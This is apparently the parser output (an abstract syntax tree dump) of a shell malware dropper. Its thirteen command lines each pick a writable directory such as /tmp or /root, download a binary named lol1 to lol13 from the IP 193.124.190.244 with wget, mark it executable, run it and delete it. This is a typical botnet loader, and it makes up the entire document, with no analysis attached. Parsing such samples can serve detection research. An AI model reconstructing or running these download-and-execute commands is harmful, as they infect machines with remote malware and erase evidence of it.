ListNode(lineno=2, pos=(12, 135), parts=[
  CommandNode(lineno=2, pos=(12, 19), parts=[
    WordNode(lineno=2, pos=(12, 14), word='cd'),
    WordNode(lineno=2, pos=(15, 19), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(20, 22)),
  CommandNode(lineno=2, pos=(23, 34), parts=[
    WordNode(lineno=2, pos=(23, 25), word='cd'),
    WordNode(lineno=2, pos=(26, 34), word='/var/run'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(35, 37)),
  CommandNode(lineno=2, pos=(38, 45), parts=[
    WordNode(lineno=2, pos=(38, 40), word='cd'),
    WordNode(lineno=2, pos=(41, 45), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(46, 48)),
  CommandNode(lineno=2, pos=(49, 57), parts=[
    WordNode(lineno=2, pos=(49, 51), word='cd'),
    WordNode(lineno=2, pos=(52, 57), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(58, 60)),
  CommandNode(lineno=2, pos=(61, 65), parts=[
    WordNode(lineno=2, pos=(61, 63), word='cd'),
    WordNode(lineno=2, pos=(64, 65), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(65, 66)),
  CommandNode(lineno=2, pos=(67, 99), parts=[
    WordNode(lineno=2, pos=(67, 71), word='wget'),
    WordNode(lineno=2, pos=(72, 99), word='http://193.124.190.244/lol1'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(99, 100)),
  CommandNode(lineno=2, pos=(101, 114), parts=[
    WordNode(lineno=2, pos=(101, 106), word='chmod'),
    WordNode(lineno=2, pos=(107, 109), word='+x'),
    WordNode(lineno=2, pos=(110, 114), word='lol1'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(114, 115)),
  CommandNode(lineno=2, pos=(116, 122), parts=[
    WordNode(lineno=2, pos=(116, 122), word='./lol1'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(122, 123)),
  CommandNode(lineno=2, pos=(124, 135), parts=[
    WordNode(lineno=2, pos=(124, 126), word='rm'),
    WordNode(lineno=2, pos=(127, 130), word='-rf'),
    WordNode(lineno=2, pos=(131, 135), word='lol1'),
  ]),
])
ListNode(lineno=3, pos=(136, 259), parts=[
  CommandNode(lineno=3, pos=(136, 143), parts=[
    WordNode(lineno=3, pos=(136, 138), word='cd'),
    WordNode(lineno=3, pos=(139, 143), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(144, 146)),
  CommandNode(lineno=3, pos=(147, 158), parts=[
    WordNode(lineno=3, pos=(147, 149), word='cd'),
    WordNode(lineno=3, pos=(150, 158), word='/var/run'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(159, 161)),
  CommandNode(lineno=3, pos=(162, 169), parts=[
    WordNode(lineno=3, pos=(162, 164), word='cd'),
    WordNode(lineno=3, pos=(165, 169), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(170, 172)),
  CommandNode(lineno=3, pos=(173, 181), parts=[
    WordNode(lineno=3, pos=(173, 175), word='cd'),
    WordNode(lineno=3, pos=(176, 181), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(182, 184)),
  CommandNode(lineno=3, pos=(185, 189), parts=[
    WordNode(lineno=3, pos=(185, 187), word='cd'),
    WordNode(lineno=3, pos=(188, 189), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(189, 190)),
  CommandNode(lineno=3, pos=(191, 223), parts=[
    WordNode(lineno=3, pos=(191, 195), word='wget'),
    WordNode(lineno=3, pos=(196, 223), word='http://193.124.190.244/lol2'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(223, 224)),
  CommandNode(lineno=3, pos=(225, 238), parts=[
    WordNode(lineno=3, pos=(225, 230), word='chmod'),
    WordNode(lineno=3, pos=(231, 233), word='+x'),
    WordNode(lineno=3, pos=(234, 238), word='lol2'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(238, 239)),
  CommandNode(lineno=3, pos=(240, 246), parts=[
    WordNode(lineno=3, pos=(240, 246), word='./lol2'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(246, 247)),
  CommandNode(lineno=3, pos=(248, 259), parts=[
    WordNode(lineno=3, pos=(248, 250), word='rm'),
    WordNode(lineno=3, pos=(251, 254), word='-rf'),
    WordNode(lineno=3, pos=(255, 259), word='lol2'),
  ]),
])
ListNode(lineno=4, pos=(260, 383), parts=[
  CommandNode(lineno=4, pos=(260, 267), parts=[
    WordNode(lineno=4, pos=(260, 262), word='cd'),
    WordNode(lineno=4, pos=(263, 267), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(268, 270)),
  CommandNode(lineno=4, pos=(271, 282), parts=[
    WordNode(lineno=4, pos=(271, 273), word='cd'),
    WordNode(lineno=4, pos=(274, 282), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(283, 285)),
  CommandNode(lineno=4, pos=(286, 293), parts=[
    WordNode(lineno=4, pos=(286, 288), word='cd'),
    WordNode(lineno=4, pos=(289, 293), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(294, 296)),
  CommandNode(lineno=4, pos=(297, 305), parts=[
    WordNode(lineno=4, pos=(297, 299), word='cd'),
    WordNode(lineno=4, pos=(300, 305), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(306, 308)),
  CommandNode(lineno=4, pos=(309, 313), parts=[
    WordNode(lineno=4, pos=(309, 311), word='cd'),
    WordNode(lineno=4, pos=(312, 313), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(313, 314)),
  CommandNode(lineno=4, pos=(315, 347), parts=[
    WordNode(lineno=4, pos=(315, 319), word='wget'),
    WordNode(lineno=4, pos=(320, 347), word='http://193.124.190.244/lol3'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(347, 348)),
  CommandNode(lineno=4, pos=(349, 362), parts=[
    WordNode(lineno=4, pos=(349, 354), word='chmod'),
    WordNode(lineno=4, pos=(355, 357), word='+x'),
    WordNode(lineno=4, pos=(358, 362), word='lol3'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(362, 363)),
  CommandNode(lineno=4, pos=(364, 370), parts=[
    WordNode(lineno=4, pos=(364, 370), word='./lol3'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(370, 371)),
  CommandNode(lineno=4, pos=(372, 383), parts=[
    WordNode(lineno=4, pos=(372, 374), word='rm'),
    WordNode(lineno=4, pos=(375, 378), word='-rf'),
    WordNode(lineno=4, pos=(379, 383), word='lol3'),
  ]),
])
ListNode(lineno=5, pos=(384, 507), parts=[
  CommandNode(lineno=5, pos=(384, 391), parts=[
    WordNode(lineno=5, pos=(384, 386), word='cd'),
    WordNode(lineno=5, pos=(387, 391), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(392, 394)),
  CommandNode(lineno=5, pos=(395, 406), parts=[
    WordNode(lineno=5, pos=(395, 397), word='cd'),
    WordNode(lineno=5, pos=(398, 406), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(407, 409)),
  CommandNode(lineno=5, pos=(410, 417), parts=[
    WordNode(lineno=5, pos=(410, 412), word='cd'),
    WordNode(lineno=5, pos=(413, 417), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(418, 420)),
  CommandNode(lineno=5, pos=(421, 429), parts=[
    WordNode(lineno=5, pos=(421, 423), word='cd'),
    WordNode(lineno=5, pos=(424, 429), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(430, 432)),
  CommandNode(lineno=5, pos=(433, 437), parts=[
    WordNode(lineno=5, pos=(433, 435), word='cd'),
    WordNode(lineno=5, pos=(436, 437), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(437, 438)),
  CommandNode(lineno=5, pos=(439, 471), parts=[
    WordNode(lineno=5, pos=(439, 443), word='wget'),
    WordNode(lineno=5, pos=(444, 471), word='http://193.124.190.244/lol4'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(471, 472)),
  CommandNode(lineno=5, pos=(473, 486), parts=[
    WordNode(lineno=5, pos=(473, 478), word='chmod'),
    WordNode(lineno=5, pos=(479, 481), word='+x'),
    WordNode(lineno=5, pos=(482, 486), word='lol4'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(486, 487)),
  CommandNode(lineno=5, pos=(488, 494), parts=[
    WordNode(lineno=5, pos=(488, 494), word='./lol4'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(494, 495)),
  CommandNode(lineno=5, pos=(496, 507), parts=[
    WordNode(lineno=5, pos=(496, 498), word='rm'),
    WordNode(lineno=5, pos=(499, 502), word='-rf'),
    WordNode(lineno=5, pos=(503, 507), word='lol4'),
  ]),
])
ListNode(lineno=6, pos=(508, 631), parts=[
  CommandNode(lineno=6, pos=(508, 515), parts=[
    WordNode(lineno=6, pos=(508, 510), word='cd'),
    WordNode(lineno=6, pos=(511, 515), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(516, 518)),
  CommandNode(lineno=6, pos=(519, 530), parts=[
    WordNode(lineno=6, pos=(519, 521), word='cd'),
    WordNode(lineno=6, pos=(522, 530), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(531, 533)),
  CommandNode(lineno=6, pos=(534, 541), parts=[
    WordNode(lineno=6, pos=(534, 536), word='cd'),
    WordNode(lineno=6, pos=(537, 541), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(542, 544)),
  CommandNode(lineno=6, pos=(545, 553), parts=[
    WordNode(lineno=6, pos=(545, 547), word='cd'),
    WordNode(lineno=6, pos=(548, 553), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(554, 556)),
  CommandNode(lineno=6, pos=(557, 561), parts=[
    WordNode(lineno=6, pos=(557, 559), word='cd'),
    WordNode(lineno=6, pos=(560, 561), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(561, 562)),
  CommandNode(lineno=6, pos=(563, 595), parts=[
    WordNode(lineno=6, pos=(563, 567), word='wget'),
    WordNode(lineno=6, pos=(568, 595), word='http://193.124.190.244/lol5'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(595, 596)),
  CommandNode(lineno=6, pos=(597, 610), parts=[
    WordNode(lineno=6, pos=(597, 602), word='chmod'),
    WordNode(lineno=6, pos=(603, 605), word='+x'),
    WordNode(lineno=6, pos=(606, 610), word='lol5'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(610, 611)),
  CommandNode(lineno=6, pos=(612, 618), parts=[
    WordNode(lineno=6, pos=(612, 618), word='./lol5'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(618, 619)),
  CommandNode(lineno=6, pos=(620, 631), parts=[
    WordNode(lineno=6, pos=(620, 622), word='rm'),
    WordNode(lineno=6, pos=(623, 626), word='-rf'),
    WordNode(lineno=6, pos=(627, 631), word='lol5'),
  ]),
])
ListNode(lineno=7, pos=(632, 755), parts=[
  CommandNode(lineno=7, pos=(632, 639), parts=[
    WordNode(lineno=7, pos=(632, 634), word='cd'),
    WordNode(lineno=7, pos=(635, 639), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(640, 642)),
  CommandNode(lineno=7, pos=(643, 654), parts=[
    WordNode(lineno=7, pos=(643, 645), word='cd'),
    WordNode(lineno=7, pos=(646, 654), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(655, 657)),
  CommandNode(lineno=7, pos=(658, 665), parts=[
    WordNode(lineno=7, pos=(658, 660), word='cd'),
    WordNode(lineno=7, pos=(661, 665), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(666, 668)),
  CommandNode(lineno=7, pos=(669, 677), parts=[
    WordNode(lineno=7, pos=(669, 671), word='cd'),
    WordNode(lineno=7, pos=(672, 677), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(678, 680)),
  CommandNode(lineno=7, pos=(681, 685), parts=[
    WordNode(lineno=7, pos=(681, 683), word='cd'),
    WordNode(lineno=7, pos=(684, 685), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(685, 686)),
  CommandNode(lineno=7, pos=(687, 719), parts=[
    WordNode(lineno=7, pos=(687, 691), word='wget'),
    WordNode(lineno=7, pos=(692, 719), word='http://193.124.190.244/lol6'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(719, 720)),
  CommandNode(lineno=7, pos=(721, 734), parts=[
    WordNode(lineno=7, pos=(721, 726), word='chmod'),
    WordNode(lineno=7, pos=(727, 729), word='+x'),
    WordNode(lineno=7, pos=(730, 734), word='lol6'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(734, 735)),
  CommandNode(lineno=7, pos=(736, 742), parts=[
    WordNode(lineno=7, pos=(736, 742), word='./lol6'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(742, 743)),
  CommandNode(lineno=7, pos=(744, 755), parts=[
    WordNode(lineno=7, pos=(744, 746), word='rm'),
    WordNode(lineno=7, pos=(747, 750), word='-rf'),
    WordNode(lineno=7, pos=(751, 755), word='lol6'),
  ]),
])
ListNode(lineno=8, pos=(756, 879), parts=[
  CommandNode(lineno=8, pos=(756, 763), parts=[
    WordNode(lineno=8, pos=(756, 758), word='cd'),
    WordNode(lineno=8, pos=(759, 763), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(764, 766)),
  CommandNode(lineno=8, pos=(767, 778), parts=[
    WordNode(lineno=8, pos=(767, 769), word='cd'),
    WordNode(lineno=8, pos=(770, 778), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(779, 781)),
  CommandNode(lineno=8, pos=(782, 789), parts=[
    WordNode(lineno=8, pos=(782, 784), word='cd'),
    WordNode(lineno=8, pos=(785, 789), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(790, 792)),
  CommandNode(lineno=8, pos=(793, 801), parts=[
    WordNode(lineno=8, pos=(793, 795), word='cd'),
    WordNode(lineno=8, pos=(796, 801), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(802, 804)),
  CommandNode(lineno=8, pos=(805, 809), parts=[
    WordNode(lineno=8, pos=(805, 807), word='cd'),
    WordNode(lineno=8, pos=(808, 809), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(809, 810)),
  CommandNode(lineno=8, pos=(811, 843), parts=[
    WordNode(lineno=8, pos=(811, 815), word='wget'),
    WordNode(lineno=8, pos=(816, 843), word='http://193.124.190.244/lol7'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(843, 844)),
  CommandNode(lineno=8, pos=(845, 858), parts=[
    WordNode(lineno=8, pos=(845, 850), word='chmod'),
    WordNode(lineno=8, pos=(851, 853), word='+x'),
    WordNode(lineno=8, pos=(854, 858), word='lol7'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(858, 859)),
  CommandNode(lineno=8, pos=(860, 866), parts=[
    WordNode(lineno=8, pos=(860, 866), word='./lol7'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(866, 867)),
  CommandNode(lineno=8, pos=(868, 879), parts=[
    WordNode(lineno=8, pos=(868, 870), word='rm'),
    WordNode(lineno=8, pos=(871, 874), word='-rf'),
    WordNode(lineno=8, pos=(875, 879), word='lol7'),
  ]),
])
ListNode(lineno=9, pos=(880, 1003), parts=[
  CommandNode(lineno=9, pos=(880, 887), parts=[
    WordNode(lineno=9, pos=(880, 882), word='cd'),
    WordNode(lineno=9, pos=(883, 887), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(888, 890)),
  CommandNode(lineno=9, pos=(891, 902), parts=[
    WordNode(lineno=9, pos=(891, 893), word='cd'),
    WordNode(lineno=9, pos=(894, 902), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(903, 905)),
  CommandNode(lineno=9, pos=(906, 913), parts=[
    WordNode(lineno=9, pos=(906, 908), word='cd'),
    WordNode(lineno=9, pos=(909, 913), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(914, 916)),
  CommandNode(lineno=9, pos=(917, 925), parts=[
    WordNode(lineno=9, pos=(917, 919), word='cd'),
    WordNode(lineno=9, pos=(920, 925), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(926, 928)),
  CommandNode(lineno=9, pos=(929, 933), parts=[
    WordNode(lineno=9, pos=(929, 931), word='cd'),
    WordNode(lineno=9, pos=(932, 933), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(933, 934)),
  CommandNode(lineno=9, pos=(935, 967), parts=[
    WordNode(lineno=9, pos=(935, 939), word='wget'),
    WordNode(lineno=9, pos=(940, 967), word='http://193.124.190.244/lol8'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(967, 968)),
  CommandNode(lineno=9, pos=(969, 982), parts=[
    WordNode(lineno=9, pos=(969, 974), word='chmod'),
    WordNode(lineno=9, pos=(975, 977), word='+x'),
    WordNode(lineno=9, pos=(978, 982), word='lol8'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(982, 983)),
  CommandNode(lineno=9, pos=(984, 990), parts=[
    WordNode(lineno=9, pos=(984, 990), word='./lol8'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(990, 991)),
  CommandNode(lineno=9, pos=(992, 1003), parts=[
    WordNode(lineno=9, pos=(992, 994), word='rm'),
    WordNode(lineno=9, pos=(995, 998), word='-rf'),
    WordNode(lineno=9, pos=(999, 1003), word='lol8'),
  ]),
])
ListNode(lineno=10, pos=(1004, 1127), parts=[
  CommandNode(lineno=10, pos=(1004, 1011), parts=[
    WordNode(lineno=10, pos=(1004, 1006), word='cd'),
    WordNode(lineno=10, pos=(1007, 1011), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1012, 1014)),
  CommandNode(lineno=10, pos=(1015, 1026), parts=[
    WordNode(lineno=10, pos=(1015, 1017), word='cd'),
    WordNode(lineno=10, pos=(1018, 1026), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1027, 1029)),
  CommandNode(lineno=10, pos=(1030, 1037), parts=[
    WordNode(lineno=10, pos=(1030, 1032), word='cd'),
    WordNode(lineno=10, pos=(1033, 1037), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1038, 1040)),
  CommandNode(lineno=10, pos=(1041, 1049), parts=[
    WordNode(lineno=10, pos=(1041, 1043), word='cd'),
    WordNode(lineno=10, pos=(1044, 1049), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1050, 1052)),
  CommandNode(lineno=10, pos=(1053, 1057), parts=[
    WordNode(lineno=10, pos=(1053, 1055), word='cd'),
    WordNode(lineno=10, pos=(1056, 1057), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1057, 1058)),
  CommandNode(lineno=10, pos=(1059, 1091), parts=[
    WordNode(lineno=10, pos=(1059, 1063), word='wget'),
    WordNode(lineno=10, pos=(1064, 1091), word='http://193.124.190.244/lol9'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1091, 1092)),
  CommandNode(lineno=10, pos=(1093, 1106), parts=[
    WordNode(lineno=10, pos=(1093, 1098), word='chmod'),
    WordNode(lineno=10, pos=(1099, 1101), word='+x'),
    WordNode(lineno=10, pos=(1102, 1106), word='lol9'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1106, 1107)),
  CommandNode(lineno=10, pos=(1108, 1114), parts=[
    WordNode(lineno=10, pos=(1108, 1114), word='./lol9'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1114, 1115)),
  CommandNode(lineno=10, pos=(1116, 1127), parts=[
    WordNode(lineno=10, pos=(1116, 1118), word='rm'),
    WordNode(lineno=10, pos=(1119, 1122), word='-rf'),
    WordNode(lineno=10, pos=(1123, 1127), word='lol9'),
  ]),
])
ListNode(lineno=11, pos=(1128, 1255), parts=[
  CommandNode(lineno=11, pos=(1128, 1135), parts=[
    WordNode(lineno=11, pos=(1128, 1130), word='cd'),
    WordNode(lineno=11, pos=(1131, 1135), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1136, 1138)),
  CommandNode(lineno=11, pos=(1139, 1150), parts=[
    WordNode(lineno=11, pos=(1139, 1141), word='cd'),
    WordNode(lineno=11, pos=(1142, 1150), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1151, 1153)),
  CommandNode(lineno=11, pos=(1154, 1161), parts=[
    WordNode(lineno=11, pos=(1154, 1156), word='cd'),
    WordNode(lineno=11, pos=(1157, 1161), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1162, 1164)),
  CommandNode(lineno=11, pos=(1165, 1173), parts=[
    WordNode(lineno=11, pos=(1165, 1167), word='cd'),
    WordNode(lineno=11, pos=(1168, 1173), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1174, 1176)),
  CommandNode(lineno=11, pos=(1177, 1181), parts=[
    WordNode(lineno=11, pos=(1177, 1179), word='cd'),
    WordNode(lineno=11, pos=(1180, 1181), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1181, 1182)),
  CommandNode(lineno=11, pos=(1183, 1216), parts=[
    WordNode(lineno=11, pos=(1183, 1187), word='wget'),
    WordNode(lineno=11, pos=(1188, 1216), word='http://193.124.190.244/lol10'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1216, 1217)),
  CommandNode(lineno=11, pos=(1218, 1232), parts=[
    WordNode(lineno=11, pos=(1218, 1223), word='chmod'),
    WordNode(lineno=11, pos=(1224, 1226), word='+x'),
    WordNode(lineno=11, pos=(1227, 1232), word='lol10'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1232, 1233)),
  CommandNode(lineno=11, pos=(1234, 1241), parts=[
    WordNode(lineno=11, pos=(1234, 1241), word='./lol10'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1241, 1242)),
  CommandNode(lineno=11, pos=(1243, 1255), parts=[
    WordNode(lineno=11, pos=(1243, 1245), word='rm'),
    WordNode(lineno=11, pos=(1246, 1249), word='-rf'),
    WordNode(lineno=11, pos=(1250, 1255), word='lol10'),
  ]),
])
ListNode(lineno=12, pos=(1256, 1383), parts=[
  CommandNode(lineno=12, pos=(1256, 1263), parts=[
    WordNode(lineno=12, pos=(1256, 1258), word='cd'),
    WordNode(lineno=12, pos=(1259, 1263), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1264, 1266)),
  CommandNode(lineno=12, pos=(1267, 1278), parts=[
    WordNode(lineno=12, pos=(1267, 1269), word='cd'),
    WordNode(lineno=12, pos=(1270, 1278), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1279, 1281)),
  CommandNode(lineno=12, pos=(1282, 1289), parts=[
    WordNode(lineno=12, pos=(1282, 1284), word='cd'),
    WordNode(lineno=12, pos=(1285, 1289), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1290, 1292)),
  CommandNode(lineno=12, pos=(1293, 1301), parts=[
    WordNode(lineno=12, pos=(1293, 1295), word='cd'),
    WordNode(lineno=12, pos=(1296, 1301), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1302, 1304)),
  CommandNode(lineno=12, pos=(1305, 1309), parts=[
    WordNode(lineno=12, pos=(1305, 1307), word='cd'),
    WordNode(lineno=12, pos=(1308, 1309), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1309, 1310)),
  CommandNode(lineno=12, pos=(1311, 1344), parts=[
    WordNode(lineno=12, pos=(1311, 1315), word='wget'),
    WordNode(lineno=12, pos=(1316, 1344), word='http://193.124.190.244/lol11'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1344, 1345)),
  CommandNode(lineno=12, pos=(1346, 1360), parts=[
    WordNode(lineno=12, pos=(1346, 1351), word='chmod'),
    WordNode(lineno=12, pos=(1352, 1354), word='+x'),
    WordNode(lineno=12, pos=(1355, 1360), word='lol11'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1360, 1361)),
  CommandNode(lineno=12, pos=(1362, 1369), parts=[
    WordNode(lineno=12, pos=(1362, 1369), word='./lol11'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1369, 1370)),
  CommandNode(lineno=12, pos=(1371, 1383), parts=[
    WordNode(lineno=12, pos=(1371, 1373), word='rm'),
    WordNode(lineno=12, pos=(1374, 1377), word='-rf'),
    WordNode(lineno=12, pos=(1378, 1383), word='lol11'),
  ]),
])
ListNode(lineno=13, pos=(1384, 1511), parts=[
  CommandNode(lineno=13, pos=(1384, 1391), parts=[
    WordNode(lineno=13, pos=(1384, 1386), word='cd'),
    WordNode(lineno=13, pos=(1387, 1391), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1392, 1394)),
  CommandNode(lineno=13, pos=(1395, 1406), parts=[
    WordNode(lineno=13, pos=(1395, 1397), word='cd'),
    WordNode(lineno=13, pos=(1398, 1406), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1407, 1409)),
  CommandNode(lineno=13, pos=(1410, 1417), parts=[
    WordNode(lineno=13, pos=(1410, 1412), word='cd'),
    WordNode(lineno=13, pos=(1413, 1417), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1418, 1420)),
  CommandNode(lineno=13, pos=(1421, 1429), parts=[
    WordNode(lineno=13, pos=(1421, 1423), word='cd'),
    WordNode(lineno=13, pos=(1424, 1429), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1430, 1432)),
  CommandNode(lineno=13, pos=(1433, 1437), parts=[
    WordNode(lineno=13, pos=(1433, 1435), word='cd'),
    WordNode(lineno=13, pos=(1436, 1437), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1437, 1438)),
  CommandNode(lineno=13, pos=(1439, 1472), parts=[
    WordNode(lineno=13, pos=(1439, 1443), word='wget'),
    WordNode(lineno=13, pos=(1444, 1472), word='http://193.124.190.244/lol12'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1472, 1473)),
  CommandNode(lineno=13, pos=(1474, 1488), parts=[
    WordNode(lineno=13, pos=(1474, 1479), word='chmod'),
    WordNode(lineno=13, pos=(1480, 1482), word='+x'),
    WordNode(lineno=13, pos=(1483, 1488), word='lol12'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1488, 1489)),
  CommandNode(lineno=13, pos=(1490, 1497), parts=[
    WordNode(lineno=13, pos=(1490, 1497), word='./lol12'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1497, 1498)),
  CommandNode(lineno=13, pos=(1499, 1511), parts=[
    WordNode(lineno=13, pos=(1499, 1501), word='rm'),
    WordNode(lineno=13, pos=(1502, 1505), word='-rf'),
    WordNode(lineno=13, pos=(1506, 1511), word='lol12'),
  ]),
])
ListNode(lineno=14, pos=(1512, 1639), parts=[
  CommandNode(lineno=14, pos=(1512, 1519), parts=[
    WordNode(lineno=14, pos=(1512, 1514), word='cd'),
    WordNode(lineno=14, pos=(1515, 1519), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1520, 1522)),
  CommandNode(lineno=14, pos=(1523, 1534), parts=[
    WordNode(lineno=14, pos=(1523, 1525), word='cd'),
    WordNode(lineno=14, pos=(1526, 1534), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1535, 1537)),
  CommandNode(lineno=14, pos=(1538, 1545), parts=[
    WordNode(lineno=14, pos=(1538, 1540), word='cd'),
    WordNode(lineno=14, pos=(1541, 1545), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1546, 1548)),
  CommandNode(lineno=14, pos=(1549, 1557), parts=[
    WordNode(lineno=14, pos=(1549, 1551), word='cd'),
    WordNode(lineno=14, pos=(1552, 1557), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1558, 1560)),
  CommandNode(lineno=14, pos=(1561, 1565), parts=[
    WordNode(lineno=14, pos=(1561, 1563), word='cd'),
    WordNode(lineno=14, pos=(1564, 1565), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1565, 1566)),
  CommandNode(lineno=14, pos=(1567, 1600), parts=[
    WordNode(lineno=14, pos=(1567, 1571), word='wget'),
    WordNode(lineno=14, pos=(1572, 1600), word='http://193.124.190.244/lol13'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1600, 1601)),
  CommandNode(lineno=14, pos=(1602, 1616), parts=[
    WordNode(lineno=14, pos=(1602, 1607), word='chmod'),
    WordNode(lineno=14, pos=(1608, 1610), word='+x'),
    WordNode(lineno=14, pos=(1611, 1616), word='lol13'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1616, 1617)),
  CommandNode(lineno=14, pos=(1618, 1625), parts=[
    WordNode(lineno=14, pos=(1618, 1625), word='./lol13'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1625, 1626)),
  CommandNode(lineno=14, pos=(1627, 1639), parts=[
    WordNode(lineno=14, pos=(1627, 1629), word='rm'),
    WordNode(lineno=14, pos=(1630, 1633), word='-rf'),
    WordNode(lineno=14, pos=(1634, 1639), word='lol13'),
  ]),
])
